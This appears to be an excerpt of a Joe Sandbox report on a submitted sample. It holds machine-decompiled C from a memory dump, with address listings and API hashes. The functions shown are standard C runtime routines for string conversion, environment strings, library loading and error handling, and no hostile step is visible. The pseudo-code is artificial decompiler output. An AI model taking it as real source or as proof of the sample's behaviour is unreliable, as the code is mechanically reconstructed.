										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E012333D0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E012403A0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E012402C0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E012402C0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E012402C0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0123791E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E01241000(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E01236FAD();
					_t183 = 0x22;
					 *_t129 = _t183;
					E01236CDB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































        0x0123761b
        0x01237626
        0x0123762d
        0x0123762f
        0x0123762f
        0x01237631
        0x0123763a
        0x0123763c
        0x01237641
        0x01237647
        0x0123765d
        0x01237662
        0x01237665
        0x01237672
        0x01237677
        0x012376cb
        0x012376d3
        0x012376d5
        0x012376d7
        0x012376da
        0x012376da
        0x012376da
        0x012376e0
        0x012376e8
        0x012376fb
        0x012376fe
        0x01237700
        0x01237703
        0x01237704
        0x01237725
        0x01237728
        0x01237728
        0x01237706
        0x01237706
        0x01237708
        0x01237713
        0x01237713
        0x01237715
        0x0123771c
        0x01237717
        0x01237717
        0x01237717
        0x01237715
        0x01237729
        0x0123772b
        0x0123772c
        0x0123772f
        0x01237731
        0x0123773b
        0x01237745
        0x01237733
        0x01237733
        0x01237733
        0x0123774a
        0x0123774a
        0x0123774f
        0x01237752
        0x0123775d
        0x0123775d
        0x0123775d
        0x0123775d
        0x01237761
        0x01237768
        0x01237769
        0x0123776c
        0x0123776f
        0x0123776f
        0x01237771
        0x00000000
        0x00000000
        0x01237789
        0x01237790
        0x01237794
        0x01237797
        0x0123779a
        0x0123779c
        0x0123779c
        0x0123779c
        0x0123779e
        0x012377a1
        0x012377a4
        0x012377a6
        0x012377ae
        0x012377b4
        0x012377b7
        0x012377ba
        0x012377bb
        0x012377be
        0x012377c1
        0x012377c1
        0x012377c6
        0x012377c9
        0x00000000
        0x00000000
        0x012377e1
        0x012377e6
        0x012377ea
        0x00000000
        0x00000000
        0x012377ee
        0x012377f1
        0x012377f2
        0x012377f2
        0x012377f4
        0x012377f7
        0x00000000
        0x00000000
        0x012377f9
        0x012377fc
        0x01237803
        0x01237806
        0x01237809
        0x0123781f
        0x0123781f
        0x0123781f
        0x0123780b
        0x0123780b
        0x0123780d
        0x01237810
        0x0123781b
        0x01237812
        0x01237815
        0x01237815
        0x01237810
        0x00000000
        0x01237809
        0x012377fe
        0x012377fe
        0x01237800
        0x01237800
        0x01237754
        0x01237754
        0x01237757
        0x01237822
        0x01237822
        0x01237824
        0x01237826
        0x01237829
        0x0123782a
        0x0123782b
        0x0123782c
        0x01237834
        0x01237834
        0x01237834
        0x01237836
        0x01237839
        0x0123783c
        0x0123783e
        0x0123783e
        0x01237840
        0x01237852
        0x01237856
        0x01237859
        0x01237860
        0x01237868
        0x01237868
        0x0123786b
        0x0123786d
        0x0123787e
        0x0123787e
        0x01237882
        0x01237882
        0x01237885
        0x01237887
        0x0123788a
        0x00000000
        0x0123786f
        0x0123786f
        0x01237875
        0x01237875
        0x01237879
        0x0123788c
        0x0123788c
        0x01237890
        0x01237891
        0x01237893
        0x01237895
        0x012378d6
        0x012378d6
        0x012378d8
        0x012378e5
        0x012378e5
        0x012378e7
        0x012378e9
        0x012378ea
        0x012378eb
        0x012378f2
        0x012378f5
        0x012378f7
        0x012378f7
        0x012378f8
        0x012378fa
        0x012378fd
        0x012378fd
        0x012378ff
        0x01237901
        0x00000000
        0x01237901
        0x012378da
        0x012378dc
        0x00000000
        0x00000000
        0x012378de
        0x00000000
        0x00000000
        0x012378e0
        0x012378e3
        0x00000000
        0x00000000
        0x00000000
        0x012378e3
        0x0123789c
        0x012378a2
        0x012378a2
        0x012378a4
        0x012378a5
        0x012378a6
        0x012378a7
        0x012378ae
        0x012378b1
        0x012378b3
        0x012378b4
        0x012378b6
        0x012378c3
        0x012378c3
        0x012378c5
        0x012378c7
        0x012378c8
        0x012378c9
        0x012378d0
        0x012378d3
        0x012378d5
        0x012378d5
        0x00000000
        0x012378d5
        0x012378b8
        0x012378b8
        0x012378ba
        0x00000000
        0x00000000
        0x012378bc
        0x00000000
        0x00000000
        0x012378be
        0x012378c1
        0x00000000
        0x00000000
        0x00000000
        0x012378c1
        0x0123789e
        0x012378a0
        0x00000000
        0x00000000
        0x00000000
        0x012378a0
        0x01237871
        0x01237873
        0x00000000
        0x00000000
        0x00000000
        0x01237873
        0x0123786d
        0x00000000
        0x01237757
        0x01237752
        0x01237679
        0x0123767b
        0x00000000
        0x0123767d
        0x01237693
        0x01237698
        0x0123769a
        0x012376a6
        0x012376ac
        0x012376ad
        0x012376af
        0x012376b1
        0x012376bc
        0x012376bc
        0x012376bf
        0x012376c1
        0x012376c1
        0x012376c4
        0x0123769c
        0x0123769c
        0x0123769c
        0x00000000
        0x0123769a
        0x01237649
        0x01237649
        0x01237650
        0x01237651
        0x01237653
        0x01237905
        0x01237909
        0x0123790e
        0x0123790e
        0x0123791d
        0x0123791d

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: __alldvrm$_strrchr
        • String ID:
        • API String ID: 1036877536-0
        • Opcode ID: 7c0b278485bf7478f31fe4b7a0d4bbc590537d94cf02cd7249558cfa59f5647a
        • Instruction ID: a70f21140ec3e2031303c90ea1982e1729604674e76adad6573323c5bd5541fe
        • Opcode Fuzzy Hash: 7c0b278485bf7478f31fe4b7a0d4bbc590537d94cf02cd7249558cfa59f5647a
        • Instruction Fuzzy Hash: 3FA127F1A203879FEF268F2CC8917AABFE5EFA5350F184169D6859B281C2748941CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01239C4B, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E01239C4B(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t54;
				int _t56;
				signed int _t62;
				int _t65;
				short* _t66;
				signed int _t67;
				short* _t68;

				_t64 = __edx;
				_t34 =  *0x1249004; // 0x5a4607f2
				_v8 = _t34 ^ _t67;
				E01234161(_t54,  &_v28, __edx, _a4);
				_t56 = _a24;
				if(_t56 == 0) {
					_t53 =  *(_v24 + 8);
					_t56 = _t53;
					_a24 = _t53;
				}
				_t65 = 0;
				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E01232550(_t54, _v8 ^ _t67, _t64, _t65, _t66);
				}
				_t54 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t54 + 0x00000008 & _t40) == 0) {
					_t66 = 0;
					L11:
					if(_t66 != 0) {
						E012333D0(_t65, _t66, _t65, _t54);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
						if(_t46 != 0) {
							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
						}
					}
					L14:
					E01239D68(_t66);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t54 + 0x00000008;
				_t62 = _t54 + 8;
				if((_t40 & _t54 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t66 = E01236508(_t62, _t48 & _t62);
					if(_t66 == 0) {
						goto L14;
					}
					 *_t66 = 0xdddd;
					L9:
					_t66 =  &(_t66[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E012403C0();
				_t66 = _t68;
				if(_t66 == 0) {
					goto L14;
				}
				 *_t66 = 0xcccc;
				goto L9;
			}
























        0x01239c4b
        0x01239c53
        0x01239c5a
        0x01239c66
        0x01239c6b
        0x01239c70
        0x01239c75
        0x01239c78
        0x01239c7a
        0x01239c7a
        0x01239c7f
        0x01239c98
        0x01239c9e
        0x01239ca3
        0x01239d42
        0x01239d46
        0x01239d4b
        0x01239d4b
        0x01239d67
        0x01239d67
        0x01239ca9
        0x01239cb1
        0x01239cb5
        0x01239d01
        0x01239d03
        0x01239d05
        0x01239d0a
        0x01239d21
        0x01239d29
        0x01239d39
        0x01239d39
        0x01239d29
        0x01239d3b
        0x01239d3c
        0x00000000
        0x01239d41
        0x01239cbc
        0x01239cbe
        0x01239cc0
        0x01239cc8
        0x01239ce5
        0x01239cef
        0x01239cf4
        0x00000000
        0x00000000
        0x01239cf6
        0x01239cfc
        0x01239cfc
        0x00000000
        0x01239cfc
        0x01239ccc
        0x01239cd0
        0x01239cd5
        0x01239cd9
        0x00000000
        0x00000000
        0x01239cdb
        0x00000000

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,01237000,?,00000000,?,00000001,?,?,00000001,01237000,?), ref: 01239C98
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01239D21
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,012350D1,?), ref: 01239D33
        • __freea.LIBCMT ref: 01239D3C
          • Part of subcall function 01236508: RtlAllocateHeap.NTDLL(00000000,?), ref: 0123653A
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
        • String ID:
        • API String ID: 2652629310-0
        • Opcode ID: 8c22f591748015c81c7a6c0e2dea6034a7ef8b23c04eefc6bff29f7e79e54232
        • Instruction ID: fab074e92f621ebe8afe47b3a41a7c50d0f885dd3f6f7d328ea1c6db2c38d1bc
        • Opcode Fuzzy Hash: 8c22f591748015c81c7a6c0e2dea6034a7ef8b23c04eefc6bff29f7e79e54232
        • Instruction Fuzzy Hash: C731D2B2A2020BABDF249F68DC89EBF7BA5EB91714F040528FE05D6150E775C991CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123917E, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
        Download Yara Rule
        C-Code - Quality: 93%
        			E0123917E() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E01239147(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E01236508(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E012364CE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












        0x0123918d
        0x01239193
        0x012391eb
        0x012391eb
        0x01239195
        0x01239196
        0x0123919b
        0x012391a4
        0x012391aa
        0x012391b0
        0x012391b5
        0x00000000
        0x012391b7
        0x012391bd
        0x012391c2
        0x012391e0
        0x012391da
        0x012391da
        0x012391dc
        0x012391dc
        0x012391e3
        0x012391e8
        0x012391b5
        0x012391ef
        0x012391f2
        0x012391f2
        0x01239200

        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 01239187
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 012391AA
          • Part of subcall function 01236508: RtlAllocateHeap.NTDLL(00000000,?), ref: 0123653A
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012391D0
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 012391F2
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
        • String ID:
        • API String ID: 1794362364-0
        • Opcode ID: 5bb8008ffa06fcab26336ed21c189ec619d887fb7ae0f06818857c1cbf1e765c
        • Instruction ID: 35bbd6962b044ce2473a5b31b9ac95251029fe202aa2e1e54aef387fd04b1707
        • Opcode Fuzzy Hash: 5bb8008ffa06fcab26336ed21c189ec619d887fb7ae0f06818857c1cbf1e765c
        • Instruction Fuzzy Hash: E10188B6A222177B3B3155AB7D4CD7B6D6EDEC7EA4315012DFB05E2104DAE08D41C2B0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123933D, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 95%
        			E0123933D(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x124a0b8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x1243908 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x5a4607f3
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










        0x01239342
        0x01239346
        0x0123934d
        0x01239351
        0x0123935f
        0x01239375
        0x01239379
        0x012393a2
        0x012393a4
        0x012393a8
        0x012393ab
        0x012393ab
        0x012393b1
        0x012393b3
        0x00000000
        0x012393b4
        0x0123937b
        0x01239384
        0x01239393
        0x01239386
        0x01239389
        0x0123938f
        0x0123938f
        0x01239397
        0x00000000
        0x01239399
        0x0123939c
        0x0123939e
        0x00000000
        0x0123939e
        0x01239397
        0x01239353
        0x01239358
        0x00000000

        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,012392E4,?,00000000,00000000,00000000,?,012394E1,00000006,FlsSetValue), ref: 0123936F
        • GetLastError.KERNEL32(?,012392E4,?,00000000,00000000,00000000,?,012394E1,00000006,FlsSetValue,01243DC0,01243DC8,00000000,00000364,?,01236A94), ref: 0123937B
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,012392E4,?,00000000,00000000,00000000,?,012394E1,00000006,FlsSetValue,01243DC0,01243DC8,00000000), ref: 01239389
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: ed743959d1aa6095c80fe50c51d78cd628d800339b77a0412ef17138c24ad6ee
        • Instruction ID: 9b7d2cb5dec4222192c452efb5c440826b308c6a16c93a3866d549e9912107cf
        • Opcode Fuzzy Hash: ed743959d1aa6095c80fe50c51d78cd628d800339b77a0412ef17138c24ad6ee
        • Instruction Fuzzy Hash: 1101D8B6625223ABCF314B79BC48B563B99AF867647101120FA0AD7180D6A1D440C7E0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01232561, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
        Download Yara Rule
        C-Code - Quality: 72%
        			E01232561(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t4;
				void* _t6;
				void* _t13;
				void* _t15;
				void* _t20;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t28;

				_t30 = __edi;
				_t29 = __edx;
				_t25 = __ecx;
				_t24 = __ebx;
				_push(__esi);
				E012354A0(2);
				E01235DDE(E01232BC4());
				_t4 = E01235F0F();
				 *_t4 = E01232D80();
				_t6 = E0123296B(__edx, __edi, _t4, 1);
				_t37 = _t6;
				if(_t6 == 0) {
					L5:
					E01232C32(_t29, _t30, 7);
					asm("int3");
					E01232BFD();
					__eflags = 0;
					return 0;
				} else {
					asm("fclex");
					E01232DD8();
					E01232B0F(_t37, E01232E03);
					_push(E01232BC0());
					_t13 = E01235828(_t25, __edx);
					_pop(_t27);
					if(_t13 != 0) {
						goto L5;
					} else {
						E01232BCA();
						_t15 = E01232C1A();
						_t39 = _t15;
						if(_t15 != 0) {
							_t15 = E01235525(E01232D80);
							_pop(_t27);
						}
						E01233048(E01233048(_t15));
						E01232BD6(_t29, _t30, _t39);
						_t20 = E01235E78(_t27, _t29, E01232D80());
						_pop(_t28);
						L01235A39(_t20, _t24, _t28, _t29);
						E01232D80();
						return 0;
					}
				}
			}












        0x01232561
        0x01232561
        0x01232561
        0x01232561
        0x01232561
        0x01232564
        0x0123256f
        0x01232574
        0x01232582
        0x01232584
        0x0123258d
        0x0123258f
        0x012325f4
        0x012325f6
        0x012325fb
        0x012325fc
        0x01232601
        0x01232603
        0x01232591
        0x01232591
        0x01232593
        0x0123259d
        0x012325a7
        0x012325a8
        0x012325ae
        0x012325b1
        0x00000000
        0x012325b3
        0x012325b3
        0x012325b8
        0x012325bd
        0x012325bf
        0x012325c6
        0x012325cb
        0x012325cb
        0x012325d1
        0x012325d6
        0x012325e1
        0x012325e6
        0x012325e7
        0x012325ec
        0x012325f3
        0x012325f3
        0x012325b1

        APIs
        • ___scrt_initialize_onexit_tables.LIBCMT ref: 01232584
        • __RTC_Initialize.LIBCMT ref: 01232593
          • Part of subcall function 01232B0F: __onexit.LIBCMT ref: 01232B15
          • Part of subcall function 01232BCA: RtlInitializeSListHead.NTDLL(01249AF0), ref: 01232BCF
        • ___scrt_fastfail.LIBCMT ref: 012325F6
        • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 012325FC
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
        • String ID:
        • API String ID: 3692885319-0
        • Opcode ID: fd3ca9c57336dbcf18459d88ca60fd6c4472192258dbd7c3b43ef049f7a47ba7
        • Instruction ID: 820d88b0d732cac1d0fb45a7d7a3115ade36a76014f5046d10153a75ab7b5562
        • Opcode Fuzzy Hash: fd3ca9c57336dbcf18459d88ca60fd6c4472192258dbd7c3b43ef049f7a47ba7
        • Instruction Fuzzy Hash: 3EF05EE167431BE0D91C3FF9680AB7E068A9FF0966F141C15E648AA0C0FE19E6825172
        Uniqueness

        Uniqueness Score: -1.00%

        Function 012369C2, Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 71%
        			E012369C2(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0x1249084; // 0x3
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E012365F3(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E012394BA(_t20, _t25, _t31, __eflags,  *0x1249084, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E01236834(_t25, _t31, 0x1249d34);
							E012364CE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E012364CE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E012365B0(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x1249084; // 0x3
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E012365F3(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E012394BA(_t21, _t27, _t32, __eflags,  *0x1249084, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E01236834(_t27, _t32, 0x1249d34);
									E012364CE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E012364CE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E01239464(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E01239464(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}






















        0x012369c2
        0x012369c2
        0x012369c2
        0x012369c5
        0x012369cc
        0x012369ce
        0x012369d3
        0x012369d6
        0x012369e4
        0x012369eb
        0x012369f0
        0x012369f3
        0x012369f6
        0x01236a08
        0x01236a0d
        0x01236a0f
        0x01236a1a
        0x01236a21
        0x01236a26
        0x01236a29
        0x01236a2b
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x01236a11
        0x01236a11
        0x00000000
        0x01236a11
        0x012369f8
        0x012369f8
        0x012369f9
        0x012369f9
        0x012369fe
        0x01236a39
        0x01236a3a
        0x01236a40
        0x01236a45
        0x01236a48
        0x01236a49
        0x01236a4a
        0x01236a51
        0x01236a53
        0x01236a55
        0x01236a5a
        0x01236a5d
        0x01236a6b
        0x01236a77
        0x01236a7a
        0x01236a7d
        0x01236a8f
        0x01236a94
        0x01236a96
        0x01236aa1
        0x01236aa7
        0x01236aaf
        0x01236ab1
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x01236a98
        0x01236a98
        0x00000000
        0x01236a98
        0x01236a7f
        0x01236a7f
        0x01236a80
        0x01236a80
        0x01236ab3
        0x01236ab4
        0x01236ab4
        0x01236a5f
        0x01236a65
        0x01236a69
        0x01236abc
        0x01236abd
        0x01236ac3
        0x00000000
        0x00000000
        0x00000000
        0x01236a69
        0x01236aca
        0x01236aca
        0x012369d8
        0x012369de
        0x012369e2
        0x01236a2d
        0x01236a2e
        0x01236a38
        0x00000000
        0x00000000
        0x00000000
        0x012369e2

        APIs
        • GetLastError.KERNEL32(?,?,0123419F,?,?,?,01233D60,?,?,?,00000000), ref: 012369C6
        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 01236A2E
        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 01236A3A
